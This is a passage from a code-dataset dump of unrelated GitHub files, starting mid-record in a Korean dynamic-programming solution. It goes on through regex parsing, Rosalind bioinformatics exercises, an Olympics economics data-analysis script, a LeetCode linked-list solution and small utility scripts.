초록색, 파란색] 으로 칠하는 비용\r\n]\r\n\r\n다만 두번째 집은 첫번째 집과 같은 색깔로 칠할 수 없으므로,\r\n dp[1][0][0] = 첫번째 집을 빨간색으로 칠하고 두번째 집을 빨간색으로 칠하는 비용\r\n dp[1][1][1] = 첫번째 집을 초록색으로 칠하고 두번째 집을 초록색으로 칠하는 비용\r\n dp[1][2][2] = 첫번째 집을 파란색으로 칠하고 두번째 집을 파란색으로 칠하는 비용\r\n위의 세 요소는 가능한 최대값인 2000으로 설정했다.\r\n'''\r\n\r\ndp = [cost[0]] + [[[0, 0, 0] for _ in range(3)] for _ in range(N-1)]\r\ndp[1] = [\r\n [2000, cost[0][0] + cost[1][1], cost[0][0] + cost[1][2]],\r\n [cost[0][1] + cost[1][0], 2000, cost[0][1] + cost[1][2]],\r\n [cost[0][2] + cost[1][0], cost[0][2] + cost[1][1], 2000]\r\n]\r\n\r\nfor i in range(2, N):\r\n for j in range(3):\r\n for k in range(3):\r\n min_cost = min([dp[i-1][j][x] for x in range(3) if x != k]) # 이전 집과 같은 색으로 칠할 수 없음\r\n dp[i][j][k] = min_cost + cost[i][k]\r\n\r\n# 최소 비용 출력\r\n'''\r\n모든 집을 칠하는 최소 비용은 \r\ndp[N-1] = [\r\n 첫번째 집을 빨간색으로 칠하고 마지막 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 초록색으로 칠하고 마지막 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 파란색으로 칠하고 마지막 집을 [빨간색, 초록색, 파란색] 으로 칠하는 
비용\r\n]\r\n중 에서 첫번째 집과 마지막 집을 같은 색깔로 칠하는 경우를 제외한 경우 중의 최소값이 된다.\r\n'''\r\n\r\nprint(min(dp[N-1][0][1], dp[N-1][0][2], dp[N-1][1][0], dp[N-1][1][2], dp[N-1][2][0], dp[N-1][2][1]))","repo_name":"kaeng2/TIL","sub_path":"백준/Gold/17404. RGB거리 2/RGB거리 2.py","file_name":"RGB거리 2.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"39287179237","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 22 20:38:50 2015\n\n@author: Anton Kulesh\n\"\"\"\n\nimport csv\nimport re\n#Данная функция принимает на входе список (listOfdata=результат работы парсера) \"утверждений\", обрабатывает каждое \n#из них по определенному шаблону и записывает результат в файл \"Collection.csv\" (создание коллекции)\n\ndef collection(listOfdata,filename=\"Collection.csv\"):\n csvfile=open(filename, 'w')\n fieldnames = ['Type', 'Name','Keywords','Description']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for i in range(0,len(listOfdata)):\n if listOfdata[i][0]=='T':\n patt_theorem=r'Theorem\\s[0-9]+\\.[0-9]*\\.?\\s\\([a-zA-Z\\s\\,\\-]*\\)\\.?|Theorem\\s[0-9]+\\.[0-9]?\\.?'\n name_theorem=re.findall(patt_theorem,listOfdata[i])\n disc_theorem=[listOfdata[i].replace(name_theorem[0],\"\")]\n if '(' in name_theorem[0]:\n name_theorem=re.findall(r'\\((.*?)\\)',name_theorem[0]) \n p_theorem=r'\\)\\.?\\s?(.*?)\\.$'\n disc_theorem=re.findall(p_theorem,listOfdata[i])\n writer.writerow({'Type': 'Theorem', 'Name': name_theorem[0],'Keywords':'None','Description':disc_theorem[0]})\n elif listOfdata[i][0]=='D':\n patt_def=r'Definition\\s[0-9]+\\.[0-9]*\\.?\\s\\([a-zA-Z\\s\\,\\-]*\\)|Definition\\s[0-9]+\\.[0-9]?\\.?'\n name_def=re.findall(patt_def,listOfdata[i])\n disc_def=[listOfdata[i].replace(name_def[0],\"\")]\n if '(' in name_def[0]:\n name_def=re.findall(r'\\((.*?)\\)',name_def[0]) \n p_def='\\)\\.?\\s?(.*?)\\.$'\n disc_def=re.findall(p_def,listOfdata[i])\n writer.writerow({'Type': 'Definition', 'Name': name_def[0],'Keywords':'None','Description':disc_def[0]})\n elif listOfdata[i][0]=='L':\n patt_lemma=r'Lemma\\s[0-9]+\\.[0-9]*\\.?\\s\\([a-zA-Z\\s\\,\\-]*\\)|Lemma\\s[0-9]+\\.[0-9]?\\.?'\n name_lemma=re.findall(patt_lemma,listOfdata[i])\n disc_lemma=[listOfdata[i].replace(name_lemma[0],\"\")]\n if '(' in name_lemma[0]:\n name_lemma=re.findall(r'\\((.*?)\\)',name_lemma[0]) \n p_lemma='\\)\\.?\\s?(.*?)\\.$'\n disc_lemma=re.findall(p_lemma,listOfdata[i])\n writer.writerow({'Type': 'Lemma', 'Name': name_lemma[0],'Keywords':'None','Description':disc_lemma[0]})\n \n ","repo_name":"laputski/km-math-ontology","sub_path":"TextMining/create_collection.py","file_name":"create_collection.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"11112270001","text":"# %%\nimport os\n\n#rosalind_dir = '/media/pulpo/SD/python/Rosalind/Bioinf/'\nrosalind_dir = 'X:/bioinf/scriptsPy/Rosalind/6-10/'\n\n\n# %%\n# =============================================================================\n# ----- ejercicio 6 Contador de mismatch -----\n# =============================================================================\n\ntext_file_hamm = 'rosalind_hamm.txt'\nfull_directory_2 = os.path.join(rosalind_dir, text_file_hamm)\n\nDNA = (open(full_directory_2, \"r\")).read().split('\\n')\n\nmismatch_cnt = 0\n\n\ndna1 = DNA[0]\ndna2 = DNA[1]\n\nfor i, n in enumerate(dna1):\n if n != dna2[i]: mismatch_cnt += 1\n\n\n# %% \n# 
=============================================================================\n# ----- ejercicio 7 primera ley mendel -----\n# =============================================================================\n\n#A son homocigota dominante, B heterocigota, C homocigota recesivo\na, b, c = 2,2,2\n\ntotal = a+b+c\n\n\n#Se forman 6 ecuaciones diferentes (AA*AA, AA*Aa, AA* aa, Aa*Aa, Aa*aa, aa*aa)\n#simplifcando llegamos a esta ecuacion\npercentage = ((a*((a-1) + 2*(b+c))) + (0.75*b*(b-1)) + (b*c)) / (total*(total-1))\n#\n\n\n\n# %%\n# =============================================================================\n# ----- ejercicio 8 RNa a proteina -----\n# =============================================================================\nimport re\n\ntext_file_hamm = 'rosalind_prot.txt'\nfull_directory_2 = os.path.join(rosalind_dir, text_file_hamm)\n\n\ncodones = {\n 'UUU': 'F', 'CUU': 'L', 'AUU': 'I', 'GUU': 'V',\n 'UUC': 'F', 'CUC': 'L', 'AUC': 'I', 'GUC': 'V',\n 'UUA': 'L', 'CUA': 'L', 'AUA': 'I', 'GUA': 'V',\n 'UUG': 'L', 'CUG': 'L', 'AUG': 'M', 'GUG': 'V',\n 'UCU': 'S', 'CCU': 'P', 'ACU': 'T', 'GCU': 'A',\n 'UCC': 'S', 'CCC': 'P', 'ACC': 'T', 'GCC': 'A',\n 'UCA': 'S', 'CCA': 'P', 'ACA': 'T', 'GCA': 'A',\n 'UCG': 'S', 'CCG': 'P', 'ACG': 'T', 'GCG': 'A',\n 'UAU': 'Y', 'CAU': 'H', 'AAU': 'N', 'GAU': 'D',\n 'UAC': 'Y', 'CAC': 'H', 'AAC': 'N', 'GAC': 'D',\n 'UAA': 'Stop', 'CAA': 'Q', 'AAA': 'K', 'GAA': 'E',\n 'UAG': 'Stop', 'CAG': 'Q', 'AAG': 'K', 'GAG': 'E',\n 'UGU': 'C', 'CGU': 'R', 'AGU': 'S', 'GGU': 'G',\n 'UGC': 'C', 'CGC': 'R', 'AGC': 'S', 'GGC': 'G',\n 'UGA': 'Stop', 'CGA': 'R', 'AGA': 'R', 'GGA': 'G',\n 'UGG': 'W', 'CGG': 'R', 'AGG': 'R', 'GGG': 'G'\n}\n\n\nRNA = (open(full_directory_2, \"r\")).read()\nRNA_codons = re.findall('...', RNA)\nproteina = ''\n\n\nfor codon in RNA_codons:\n if codones.get(codon) == 'Stop': break\n proteina += codones.get(codon)\n \n \n \n# %%\n# =============================================================================\n# ----- ejercicio 9 Finding mottifs in DNA -----\n# ============================================================================= \ntext_file_subs = 'rosalind_subs.txt'\nfull_directory_2 = os.path.join(rosalind_dir, text_file_subs)\n\nsequences = (open(full_directory_2, \"r\")).read().split('\\n')\n\n\nDNA = sequences[0]\nmottifs = sequences[1] \n\nmottifs_len = len(mottifs)\n\npos = ''\nfor i, n in enumerate(DNA):\n if(DNA[i:i+mottifs_len] != mottifs): continue\n else: pos += str(i+1) + ' '\n \n \nprint (pos)\n\n\n\n\n# %%\n# =============================================================================\n# ----- ejercicio 10 making a consensus -----\n# =============================================================================\n\ntext_file_hamm = 'rosalind_cons.txt'\nfull_directory = os.path.join(rosalind_dir, text_file_hamm)\n\nfh = (open(full_directory))\n\n\n\nsequences = [] \ntemp_line = ''\nfor lines in fh:\n if (lines.startswith('>') is False):\n temp_line += lines.rstrip()\n if (temp_line != '' and lines.startswith('>')):\n sequences.append(temp_line)\n temp_line = ''\nsequences.append(temp_line)\ndel temp_line\n\nlen_seq = len(sequences[0])\n\nprofile = {\n 'A': [],\n 'C': [],\n 'G': [],\n 'T': []\n}\n\n\nfor n in range(len_seq): \n profile['A'].append(0)\n profile['C'].append(0)\n profile['G'].append(0)\n profile['T'].append(0)\n\n\n\nfor seq in sequences:\n for i, nit_base in enumerate(seq):\n profile[nit_base][i] += 1\n\n\n\ndef return_nit_bas(bases):\n bases.sort(key = lambda x: x[0], reverse = True)\n print (bases)\n return 
bases[0][1]\n\n\n\nconsensus = ''\nfor i in range(len_seq):\n consensus += return_nit_bas([[profile['A'][i], 'A'], [profile['C'][i], 'C'],\n [profile['G'][i], 'G'], [profile['T'][i], 'T']])\n\n\nprint(consensus)\n\nfor k, v in profile.items():\n print(k, end = ': ')\n for i in range(len_seq):\n print(profile[k][i], end = ' ')\n print('\\n')\n ","repo_name":"mauroRey/bioinfpy","sub_path":"Rosalind/06-10/6-10.py","file_name":"6-10.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"14488693410","text":"from datetime import date\nimport numpy as np\nimport pandas as pd\nfrom ast import literal_eval\nimport re\nimport os\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nsns.set_theme(style=\"darkgrid\")\nsns.set(rc={'figure.figsize': (16, 8)})\n\n# Olympic games related data set\nsummer_olympics_data = pd.read_csv(\"Datasets/summer.csv\")\nwinter_olympics_data = pd.read_csv(\"Datasets/winter.csv\")\n\n# Olympics costs related data set\nolympics_costs = pd.read_csv(\"Datasets/olympicscosts.csv\")\ncost_revenue = pd.read_csv(\"Datasets/cost_revenue.csv\")\nbroadcast_revenue = pd.read_csv('Datasets/broadcastrevenue.csv')\n\n# Country related data set\ncountry_codes = pd.read_csv('Datasets/countries.csv')\nmedal_data = pd.read_csv('Datasets/medals.csv')\n\n# Olympics Bid Datasets\nwinter_bid_year_df = pd.read_csv('Datasets/winterbidbyyear.csv')\nwinter_bid_country_df = pd.read_csv('Datasets/winterbidbycountry.csv')\nsummer_bid_country_df = pd.read_csv('Datasets/summerbidbycountry.csv')\nsummer_bid_year_df = pd.read_csv('Datasets/summerbidbyyear.csv')\n\n# Save the EDA results in this directory\nresults_dir = './results/'\nif not os.path.exists(results_dir):\n os.mkdir(results_dir)\n\n# Economic Indicators Data\neconomic_variables = {'NY.GDP.MKTP.CD': 'GDP', 'ST.INT.ARVL': 'Tourism Arrival', 'NY.GDP.DEFL.KD.ZG': 'Inflation',\n 'PA.NUS.FCRF': 'Exchange Rate', 'GC.DOD.TOTL.GD.ZS': 'Debt', 'NY.GDP.MKTP.KD.ZG': 'GDP Growth',\n 'NE.TRD.GNFS.ZS': 'Trade', 'NE.IMP.GNFS.ZS': 'Import Goods', 'GC.TAX.TOTL.GD.ZS': 'Tax Revenue',\n 'CM.MKT.TRAD.GD.ZS': 'Stocks', 'BX.KLT.DINV.WD.GD.ZS': 'Foreign Investments',\n 'NE.DAB.TOTL.ZS': 'Gross National Expenditure', 'GC.REV.XGRT.GD.ZS': 'Revenue',\n 'SL.IND.EMPL.ZS': 'Employment', 'SL.UEM.TOTL.NE.ZS': 'Unemployment'}\n\n# Map to fix the country code mismatch\nalias_names = {'GER': 'DEU', 'FRG': 'DEU', 'NED': 'NLD', 'SUI': 'CHE', 'YUG': 'SRB', 'URS': 'RUS', 'GRE': 'GRC'}\n\n# List of Column names\ndrop_cols = ['Unnamed: 0', 'edition_code', 'edition']\ncol_name = [\"Cost, Billion USD\", \"Cost Overrun %\", \"Country\"]\nyear_list = [i for i in range(1960, 2021)]\n\n# Dropping Unnecessary columns\ncountry_codes.drop(columns=drop_cols[0], inplace=True)\nsummer_olympics_data.drop(drop_cols, axis=1, inplace=True)\nwinter_olympics_data.drop(drop_cols, axis=1, inplace=True)\n\n# Dropping olympic games(rows) that were not conducted\nwinter_olympics_data.dropna(inplace=True)\nsummer_olympics_data.dropna(inplace=True)\n\n# Replacing country code mismatch\nsummer_olympics_data = summer_olympics_data.replace(alias_names)\nwinter_olympics_data = winter_olympics_data.replace(alias_names)\ncountry_codes = country_codes.replace(alias_names)\n\nsummer_olympics_data = summer_olympics_data.merge(country_codes, on='country_code').drop_duplicates(\n subset=['country_code', 
'year'])\nwinter_olympics_data = winter_olympics_data.merge(country_codes, on='country_code').drop_duplicates(\n subset=['country_code', 'year'])\n\n# Number of times each countries hosted the olympics\nsummer_count = summer_olympics_data.groupby(['country_name'])['year'].count()\nwinter_count = winter_olympics_data.groupby(['country_name'])['year'].count()\n\n\n# Summer Olympics\ndef freq_plot(data, text):\n plot_one = sns.barplot(x=data.index, y=data.values)\n plot_one.set_xticklabels(plot_one.get_xticklabels(), rotation=90)\n plot_one.set_title(text + ' Olympics held by Countries')\n plot_one.set_xlabel('Country')\n plot_one.set_ylabel('Count')\n plt.show()\n freq_fig = plot_one.get_figure()\n freq_fig.savefig(results_dir + text + '-' + 'count.png')\n\n\nfreq_plot(summer_count, 'Summer')\nfreq_plot(winter_count, 'Winter')\n\nsummer_hosts = winter_olympics_data['country_code'].unique()\nwinter_hosts = summer_olympics_data['country_code'].unique()\n\ndistinct_countries = [*summer_hosts, *winter_hosts]\ncountries_set = set(distinct_countries)\n\nprint(\"\\nNumber of Countries hosted Olympics: \", len(countries_set))\n\nolympics_costs[col_name[0]] = olympics_costs[col_name[0]].astype(float).fillna(olympics_costs[col_name[0]].median())\nexpensive_olympics = olympics_costs.sort_values(col_name[0], ascending=False).nlargest(10, col_name[0])\n\nplot_two = sns.barplot(x=col_name[0], y=col_name[2], data=expensive_olympics, ci=None)\nplot_two.set_title('Expensive Olympic games in both seasons')\nexpensive_games = plot_two.get_figure()\nexpensive_games.savefig(results_dir + 'expensive-games.png')\n\nplot_three = sns.lineplot(data=olympics_costs, x=\"Year\", y=col_name[0], hue=\"Type\", marker='o')\nplot_three.set_title('Cost of Olympic games over the years')\ncost_time_series = plot_three.get_figure()\ncost_time_series.savefig(results_dir + 'cost-over-years.png')\n\nsummer_games = olympics_costs[olympics_costs['Type'] == 'Summer']\nwinter_games = olympics_costs[olympics_costs['Type'] == 'Winter']\n\nexpensive_summer = summer_games[summer_games[col_name[0]] == summer_games[col_name[0]].max()]\nexpensive_winter = winter_games[winter_games[col_name[0]] == winter_games[col_name[0]].max()]\n\nprint(\"\\nMost Expensive Summer Olympic game : {}, Cost in Billions : {}\".format(expensive_summer['Games'].iloc[0], \\\n expensive_summer[col_name[0]].iloc[0]))\nprint(\"\\nMost Expensive Winter Olympic game : {}, Cost in Billions : {}\".format(expensive_winter['Games'].iloc[0], \\\n expensive_winter[col_name[0]].iloc[0]))\n\nplot_four = sns.boxplot(x='Type', y=col_name[0], data=olympics_costs, showmeans=True,\n meanprops={\"marker\": \"o\",\n \"markerfacecolor\": \"Red\",\n \"markeredgecolor\": \"Red\",\n \"markersize\": \"10\"})\nplot_four.set_title('Cost comparision of Olympic games')\nplt.show()\n\ncost_comparsion = plot_four.get_figure()\ncost_comparsion.savefig(results_dir + 'cost-comparision.png')\n\nsel_cols = ['City', 'Game', 'Year', 'Revenue', 'ProfitorLoss', 'Cost']\n\n# Data Preprocessing\nclean_data = cost_revenue.dropna()\n\nclean_data[sel_cols[3]] = clean_data[sel_cols[3]].str.replace(\",\", \"\")\nclean_data[sel_cols[4]] = clean_data[sel_cols[4]].str.replace(\",\", \"\")\nclean_data[sel_cols[5]] = clean_data[sel_cols[5]].str.replace(\",\", \"\")\n\nconvert_dict = {sel_cols[3]: 'int64', sel_cols[4]: 'int64', sel_cols[5]: 'int64'}\nclean_data = clean_data.astype(convert_dict)\n\nclean_data[sel_cols[4]] = clean_data[sel_cols[3]] - clean_data[sel_cols[5]]\nclean_data[sel_cols[3:6]] = 
clean_data[sel_cols[3:6]] / 10 ** 9\n\n# Plotting the data\nsummer_revenue_data = clean_data[clean_data['Game'] == 'Summer'][sel_cols]\nwinter_revenue_data = clean_data[clean_data['Game'] == 'Winter'][sel_cols]\n\n\ndef plot_chart(df, cols, text):\n df.plot(x=cols[0], y=cols[1:], kind=\"line\", marker='o')\n plt.xlabel(\"Year\")\n plt.ylabel(\"Cost in Billions\")\n plt.title(text + \" Olympic Game Revenue vs Profit/Loss\")\n plt.savefig(results_dir + text + '-profit-loss.png')\n plt.show()\n\n\nplot_chart(summer_revenue_data, sel_cols[2:5], 'Summer')\nplot_chart(winter_revenue_data, sel_cols[2:5], 'Winter')\n\n# Data Preprocessing\nreplace_values = {\"K\": \"000\", \"M\": \"000000\", \"B\": \"000000000\"}\nbroadcast_revenue['Broadcast Revenue'] = broadcast_revenue['Broadcast Revenue'].replace(replace_values, regex=True)\n\n\ndef convert_string(value):\n value = str(value).replace('$', \"\")\n substr = \".\"\n if substr in value:\n value = value.replace(substr, \"\").replace(\"0\", \"\", 1)\n return int(value) / 10 ** 9\n\n\nbroadcast_revenue['Broadcast Revenue'] = broadcast_revenue['Broadcast Revenue'].apply(convert_string)\nsel_cols = ['Year', 'Broadcast Revenue']\n\n# Analysis and plotting\nsummer_filtered = broadcast_revenue[broadcast_revenue['Game Type'] == 'Summer'][sel_cols]\nwinter_filtered = broadcast_revenue[broadcast_revenue['Game Type'] == 'Winter'][sel_cols]\n\nfig, (ax1, ax2) = plt.subplots(1, 2)\n\n\ndef plot_revenue_chart(df, cols, ax, text):\n ax.set_title(text + ' games broadcast revenue over the years')\n ax.stem(df[cols[0]], df[cols[1]])\n ax.set_xlabel('Years')\n ax.set_ylabel('Cost in Billions')\n fig.show()\n\n\nplot_revenue_chart(summer_filtered, sel_cols, ax1, 'Summer')\nplot_revenue_chart(winter_filtered, sel_cols, ax2, 'Winter')\nfig.savefig(results_dir + 'broadcast-revenue.png')\n\n\ndef plot_bid_countries(df, text):\n df.groupby(['Bid_Year'])['Bid_Country'].nunique().plot(kind='bar', xlabel='Bid Year',\n ylabel='Count',\n figsize=(15, 5),\n title='Number of Bidding Countries over the years for hosting ' + text + ' Olympics')\n plt.savefig(results_dir + text + '-bidcount.png')\n plt.show()\n\n\nplot_bid_countries(summer_bid_year_df, 'Summer')\nplot_bid_countries(winter_bid_year_df, 'Winter')\n\nfig, (ax1, ax2) = plt.subplots(1, 2)\n\n\ndef plot_donut(df, axis, text):\n df.groupby(['Bid_Country'])['Bid_Year'].nunique().nlargest(15, keep='first').plot(kind='pie',\n ax=axis,\n y='Bid_Year',\n ylabel=\"\",\n subplots=True,\n figsize=(10, 10),\n autopct='%1.0f%%')\n axis.add_patch(plt.Circle((0, 0), 0.7, color='white'))\n axis.set_title('Country participation in ' + text + ' Bidding process for all the years.')\n\n\nplot_donut(summer_bid_year_df, ax1, 'Summer')\nplot_donut(winter_bid_year_df, ax2, 'Winter')\nfig.savefig(results_dir + 'country-participation.png')\nfig.show()\n\nfig, axes = plt.subplots(1, 2)\n\n\n# Data Preprocessing\ndef evaluate(strinput):\n data = literal_eval(str(strinput))\n return data\n\n\ndef flatten_inputs(inputlist):\n flat_list = [listitem for sublist in inputlist for listitem in sublist]\n return flat_list\n\n\ndef process_df(df):\n cols = df.columns\n for colindex in cols[2:]:\n df[colindex] = df[colindex].apply(evaluate)\n flatten_df = df.groupby(cols[0])[cols[2:]].agg(flatten_inputs)\n for col in cols[2:]:\n flatten_df[col] = flatten_df[col].apply(lambda x: len(x))\n return flatten_df\n\n\n# Plotting Data\ndef plot_data(inputdf, axis, text):\n axes[axis].bar(inputdf.index, inputdf['Failed_Bids'], color='r', label='Failed')\n 
axes[axis].bar(inputdf.index, inputdf['Success_Bids'], color='b', bottom=inputdf['Failed_Bids'], label='Success')\n axes[axis].set_ylabel('Count')\n axes[axis].set_xlabel('Country')\n axes[axis].set_title(text + ' - Failed and Success')\n axes[axis].set_xticklabels(inputdf.index, rotation=90)\n axes[axis].legend()\n fig.show()\n\n\nplot_data(process_df(summer_bid_country_df), 0, 'Summer')\nplot_data(process_df(winter_bid_country_df), 1, 'Winter')\nfig.savefig(results_dir + 'bidding-outcomes.png')\n\ns_count = summer_olympics_data.groupby(['country_code'])['year'].count()\nw_count = winter_olympics_data.groupby(['country_name'])['year'].count()\ntotal_olympics_count = pd.merge(s_count, w_count, how='outer', right_index=True, left_index=True).fillna(0).astype(int)\n\ntotal_olympics_count = total_olympics_count.rename({\"year_x\": \"summer_count\", \"year_y\": \"winter_count\"}, axis='columns')\ntotal_olympics_count['total'] = total_olympics_count['summer_count'] + total_olympics_count['winter_count']\ntotal_olympics_count['Country_Name'] = total_olympics_count.index.map(\n lambda x: country_codes[country_codes['country_code'] == x]['country_name'])\ntotal_olympics_count.rename(index=alias_names, inplace=True)\n\nfig = px.choropleth(total_olympics_count, locations=total_olympics_count.index,\n color=\"total\",\n hover_name=\"Country_Name\",\n color_continuous_scale=px.colors.sequential.Plasma)\nfig.update_layout(\n autosize=True,\n width=900,\n height=500,\n title_text='Total Number of Olympics conducted by each country over all the years',\n)\nfig.write_html(results_dir + \"olympics-geography.html\")\nfig.show()\n\nfig, axes = plt.subplots(1, 2)\n\nnew_cols = ['Cost per event, Millions', 'Cost per athlete, Millions']\n\nolympics_costs[new_cols[0]] = (olympics_costs[col_name[0]] * 1000) / olympics_costs['Events']\nolympics_costs[new_cols[1]] = (olympics_costs[col_name[0]] * 1000) / olympics_costs['Athletes']\n\n\ndef plot_chart(inputdf, axis, text, col_name):\n sns.lineplot(data=inputdf, x=\"Year\", y=col_name, hue=\"Type\", marker='o', ax=axes[axis])\n axes[axis].set_ylabel(col_name)\n axes[axis].set_xlabel('Year')\n axes[axis].set_title(text)\n axes[axis].legend()\n fig.show()\n\n\nplot_chart(olympics_costs, 0, 'Time Series - Cost per Event', new_cols[0])\nplot_chart(olympics_costs, 1, 'Time Series - Cost per Athlete', new_cols[1])\n\ncost_overrun_df = olympics_costs.dropna(subset=[col_name[1]])\nfig = px.scatter(cost_overrun_df, x=\"Games\", y=\"Year\", size=col_name[1],\n hover_name=col_name[1], size_max=60, title='Cost Overrun(%) in Olympic games for different years.')\nfig.show()\n\nmedal_data = medal_data.replace(alias_names)\nfiltered_data = medal_data[medal_data['country_code'].isin(countries_set)] \\\n .drop_duplicates(subset=['country_code']).nlargest(10, 'total')\nfig = px.bar_polar(filtered_data, r=\"total\",\n theta='country', color='total',\n title='Top 10 olympic host countries in total medal count for all the years.')\nfig.show()\n\nsummer_host_info = summer_olympics_data.groupby('country_code')['year'].apply(list).reset_index().explode('year')\nwinter_host_info = winter_olympics_data.groupby('country_code')['year'].apply(list).reset_index().explode('year')\n\nsummer_host_info = summer_host_info[(summer_host_info['year'] >= 1964) & (summer_host_info['year'] <= 2016)]\nwinter_host_info = winter_host_info[(winter_host_info['year'] >= 1964) & (winter_host_info['year'] <= 2016)]\n\n\n# Helper Methods\ndef plot_indicator_change(df, title, game_type):\n x_value = df['Country'] + 
\"-\" + df['Year'].astype(str)\n fig = go.Figure(data=[\n go.Bar(name='Before', x=x_value, y=df['Before'].values),\n go.Bar(name='After', x=x_value, y=df['After'].values),\n ])\n fig.update_layout(barmode='group', width=900, height=500,\n title_text='Change in {} value - Before and after hosting - {} Olympics'.format(title, game_type))\n fig.show()\n\n\n# Main logic\ndef process_economic_variables(inputdf, gtype):\n cols = ['Year', 'Country', 'Before', 'After']\n\n for key, value in economic_variables.items():\n eco_df = wb.data.DataFrame(key)\n eco_df = eco_df.rename(columns=lambda x: int(x.replace('YR', '')))\n eco_df = eco_df[year_list]\n eco_df = eco_df.transpose().fillna(method='backfill').fillna(method='ffill').transpose()\n\n change_df = pd.DataFrame(columns=cols)\n row_data = {cols[0]: None, cols[1]: None, cols[2]: None, cols[3]: None}\n\n for row in inputdf.itertuples(index=False):\n row_data[cols[0]] = row.year\n row_data[cols[1]] = row.country_code\n row_data[cols[2]] = eco_df.loc[row.country_code, [i for i in range(row.year - 4, row.year)]].mean()\n row_data[cols[3]] = eco_df.loc[row.country_code, [i for i in range(row.year, row.year + 5)]].mean()\n change_df = change_df.append(row_data, ignore_index=True)\n\n change_df.dropna(inplace=True)\n plot_indicator_change(change_df, value, gtype)\n\n\nprocess_economic_variables(summer_host_info, 'Summer')\nprocess_economic_variables(winter_host_info, 'Winter')\n","repo_name":"srakhe/olympics","sub_path":"scripts/olympic_analysis/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":16076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"41092527134","text":"\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n# 4 -> 2 -> 3\n\n# 2 -> 3\n\n# rev_item = (4,)\n# next_item = (2, )\n# next_item = (2, (4,))\n# l=3\n# rev_item = (2, (4, ))\n# \n\n# 4\n# 2 -> 4\nclass Solution:\n \n def addTwoNumbers(self, l1: ListNode, l2: ListNode):\n node_1 = ListNode((l1.val + l2.val) % 10)\n first_node = node_1\n overflow = (l1.val + l2.val) > 9\n l1 = l1.next\n l2 = l2.next\n \n while True:\n aux_node = ListNode()\n if l1 and l2:\n aux_node.val = (l1.val + l2.val + overflow) % 10\n overflow = (l1.val + l2.val + overflow) > 9\n l1 = l1.next\n l2 = l2.next\n node_1.next = aux_node\n node_1 = aux_node\n elif l1:\n aux_node.val = (l1.val + overflow) % 10\n overflow = (l1.val + overflow) > 9\n l1 = l1.next\n node_1.next = aux_node\n node_1 = aux_node\n elif l2:\n aux_node.val = (l2.val + overflow) % 10\n overflow = (l2.val + overflow ) > 9\n l2 = l2.next\n node_1.next = aux_node\n node_1 = aux_node\n else:\n break\n \n\n if overflow:\n node_1.next = ListNode(1,None)\n\n return first_node\n \ns=Solution()\n\nl1 = ListNode(3, ListNode(7))\nl2 = ListNode(9, ListNode(2))\n\na = s.addTwoNumbers(l1,l2)\nprint(a.val)\nwhile a.next:\n a = a.next\n print(a.val)","repo_name":"CookiezLIT/leetCodeProblems","sub_path":"beginner/add_two_numbers.py","file_name":"add_two_numbers.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24316847820","text":"from fb_post_v2.interactors.storages import ReactionStorageInterface\n\nfrom fb_post_v2.interactors.presenters import PresenterInterface\n\nfrom typing import List, Optional\n\n\nclass GetPostsReactedByUserInteractor:\n\n def __init__(self, reaction_storage: ReactionStorageInterface,\n presenter: 
PresenterInterface):\n\n self.reaction_storage = reaction_storage\n self.presenter = presenter\n\n def get_posts_reacted_by_user(self, user_id: int) ->List[Optional[int]]:\n\n post_ids_list = self.reaction_storage.get_posts_reacted_by_user(\n user_id=user_id)\n response = self.presenter.get_posts_reacted_by_user_response(\n post_ids_list=post_ids_list\n )\n return response","repo_name":"R151865/fb_post_learning","sub_path":"fb_post_v2/interactors/get_posts_reacted_by_user_interactor.py","file_name":"get_posts_reacted_by_user_interactor.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"8684445435","text":"import circle as c\nimport numpy as np\n\n\ndef main():\n r=float(input(\"반지름을 입력하세요: \"))\n area=c.area(r)\n print(f'넓이: {area}')\n\n ci=c.ci_circle(r)\n print(f'둘레: {ci}')\n\nmain()\n\nresult = np.random.rand(10)\nprint(result)\n","repo_name":"minsu0917/java_python","sub_path":"python_work/220708/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73363774525","text":"\nVALID_RANGE = range(10) + range(10, 101, 10) + [1000] \nEXTENTION = \".wav\"\nAudioDirectory = \"sounds/\"\nAudioLoaded = False\n\nimport wave\nimport pygame\n\n'''\nclass Node(object):\n _fields = []\n def __init__( self, *args ):\n for (attr, value) in zip( self.__class__._fields, args ):\n setattr(self, attr, value)\n'''\n\nclass compositeObj:\n def __init__( self, the_file, fname ):\n self.the_file = the_file\n self.fname = fname\n\n\n\ndic = { number : compositeObj(wave.open(AudioDirectory + wave_name), wave_name) \n for (number, wave_name) in zip(VALID_RANGE, \n map(lambda x: str(x) + EXTENTION, VALID_RANGE)) }\n\ndic.update( { \"et\" : \"et.wav\" } )\n\n#XXX: Maybe it is a bad idea, probably i'm gonna find a more consice way of it\n\n\n\ndef is_valid( number ):\n return number in dic.keys()\n\ndef _prepare( number ):\n if is_valid( number ):\n return [ number ]\n\n sv = str(number)\n size = len(sv) - 1\n q = int(sv[0])\n return [ q * ( 10 ** size ) ] + _prepare(int(sv[1:])) \n\ndef regularize_me(item):\n size, sn = len(str(item)), str(item)\n if size in [4, 3]:\n return ( 